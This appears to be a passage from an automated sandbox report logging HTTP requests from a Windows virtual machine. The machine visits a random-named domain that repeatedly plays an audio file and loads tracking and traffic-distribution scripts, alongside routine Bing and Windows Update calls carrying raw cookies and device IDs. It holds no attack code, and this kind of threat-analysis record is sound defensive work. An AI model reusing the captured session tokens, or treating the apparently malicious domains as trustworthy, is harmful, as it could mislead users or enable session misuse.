Source: global traffic	HTTP traffic detected: GET /i/?l=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&j= HTTP/1.1host: t.dtscout.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /tc.js HTTP/1.1host: cdn.tynt.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pv/?_a=v&_h=xpoalswwkjddsljsy.com&_ss=65j4jc1qr0&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=1yoy&_cb=_dtspv.c HTTP/1.1host: t.dtscout.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: df=1760683901
Source: global traffic	HTTP traffic detected: GET /images/empty.png HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visit=1
Source: global traffic	HTTP traffic detected: GET /b/p?id=w!3ck54buj9z~w!3wcfa1cqds&lm=0&ts=1760683901571&dn=TC&iso=0&pu=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&t=CloudFlare&chpv=10.0.0&chuav=Chromium%3Bv%3D134.0.6998.89%2C%20Not%3AA-Brand%3Bv%3D24.0.0.0%2C%20Google%20Chrome%3Bv%3D134.0.6998.89&chp=Windows&chmob=0&chua=Chromium%3Bv%3D134%2C%20Not%3AA-Brand%3Bv%3D24%2C%20Google%20Chrome%3Bv%3D134 HTTP/1.1host: ic.tynt.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2013/01/logo1.png HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1host: api.ipify.orguser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /deb/v2?id=w!3ck54buj9z~w!3wcfa1cqds&dn=TC&cc=1&chpv=10.0.0&chuav=Chromium%3Bv%3D134.0.6998.89%2C%20Not%3AA-Brand%3Bv%3D24.0.0.0%2C%20Google%20Chrome%3Bv%3D134.0.6998.89&chp=Windows&chmob=0&chua=Chromium%3Bv%3D134%2C%20Not%3AA-Brand%3Bv%3D24%2C%20Google%20Chrome%3Bv%3D134&r=&pu=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F HTTP/1.1host: de.tynt.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://xpoalswwkjddsljsy.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visit=1
Source: global traffic	HTTP traffic detected: GET /js HTTP/1.1host: tdsworkout.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /b/p?id=w!3ck54buj9z~w!3wcfa1cqds&lm=0&ts=1760683901571&dn=TC&iso=0&pu=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&t=CloudFlare&chpv=10.0.0&chuav=Chromium%3Bv%3D134.0.6998.89%2C%20Not%3AA-Brand%3Bv%3D24.0.0.0%2C%20Google%20Chrome%3Bv%3D134.0.6998.89&chp=Windows&chmob=0&chua=Chromium%3Bv%3D134%2C%20Not%3AA-Brand%3Bv%3D24%2C%20Google%20Chrome%3Bv%3D134 HTTP/1.1host: ic.tynt.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: uid=CoIKSWjx5369lpO9BGO0Ag==priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/jupiter/assets/js/plugins/async/min/jquery.flexslider.js HTTP/1.1host: thefatshallot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /stats.php?screen2=1 HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visit=1
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3324/0?CH=563&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=AcPUwcOz8OR7GCH&MD=a89v54tN HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /images/arrow.png HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xpoalswwkjddsljsy.com/css/fix.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visit=1; click=1
Source: global traffic	HTTP traffic detected: GET /images/arrow.png HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visit=1; click=1
Source: global traffic	HTTP traffic detected: GET /din.mp3 HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, ;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://xpoalswwkjddsljsy.com/Accept-Language: en-US,en;q=0.9Cookie: visit=1; click=1Range: bytes=0-
Source: global traffic	HTTP traffic detected: GET /din.mp3 HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, ;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://xpoalswwkjddsljsy.com/Accept-Language: en-US,en;q=0.9Cookie: visit=1; click=1Range: bytes=0-
Source: global traffic	HTTP traffic detected: GET /din.mp3 HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, ;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://xpoalswwkjddsljsy.com/Accept-Language: en-US,en;q=0.9Cookie: visit=1; click=1Range: bytes=0-
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3324/0?CH=563&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=AcPUwcOz8OR7GCH&MD=a89v54tN HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /din.mp3 HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, ;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://xpoalswwkjddsljsy.com/Accept-Language: en-US,en;q=0.9Cookie: visit=1; click=1Range: bytes=0-
Source: global traffic	HTTP traffic detected: GET /din.mp3 HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, ;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://xpoalswwkjddsljsy.com/Accept-Language: en-US,en;q=0.9Cookie: visit=1; click=1Range: bytes=0-
Source: global traffic	HTTP traffic detected: GET /din.mp3 HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, ;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://xpoalswwkjddsljsy.com/Accept-Language: en-US,en;q=0.9Cookie: visit=1; click=1Range: bytes=0-
Source: global traffic	HTTP traffic detected: GET /DSB?clientDateTime=10%2F17%2F2025%2C%208%3A52%3A47%20AM&cc=CH&setlang=en-ch&dsbschemaversion=1.1&pastMomentsInDays=6 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318; SRCHHPGUSR=IPMH=68408531&IPMID=1742302773605&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318; SRCHHPGUSR=IPMH=68408531&IPMID=1742302773605&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /th?id=OHR.SedonaSpring_ROW7606994452_1920x1080.jpg&w=392&h=221&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318; SRCHHPGUSR=IPMH=68408531&IPMID=1742302773605&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=ODSWG.a63c4ede-672e-4b0b-b035-e0f9aa973fce&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318; SRCHHPGUSR=IPMH=68408531&IPMID=1742302773605&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=ODSWG.1291d182-a232-46c2-9ed6-417de99b83d9&pid=dsb HTTP/1.1host: www.bing.comx-positionertype: Desktopx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderateaccept-encoding: identityx-device-machineid: {E1FC8648-BDDC-4041-95D0-3C283137B766}x-userageclass: Unknownx-bm-market: CHx-bm-dateformat: dd/MM/yyyyx-device-ossku: 48x-bm-dtz: -240x-deviceid: 01000A410900D818x-bm-windowsflights: FX:119E26AD,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-bm-devicescale: 100x-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-device-manufacturer: VMware, Inc.x-bm-theme: 000000;0078d7x-bm-devicedimensionslogical: 784x640x-bm-devicedimensions: 784x640x-agent-deviceid: 01000A410900D818x-device-product: VMware20,1x-bm-cbt: 1760683968user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045x-device-isoptin: falseaccept-language: en-GB, en, en-USx-device-touch: falsex-device-clientsession: 3FE2546F8B2E4651A826AD6E56EED946x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIcookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=S
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9nzvl6gzqhkj_v13_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9p83g3b4h340_v10_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9nm5764dbppg_v7_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9npxcz4n8jw7_v11_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe
Source: global traffic	HTTP traffic detected: GET /th?id=OCGE.9nbckjw55fsv_v4_main&w=86&h=86&c=1&rs=1&p=0 HTTP/1.1host: th.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; 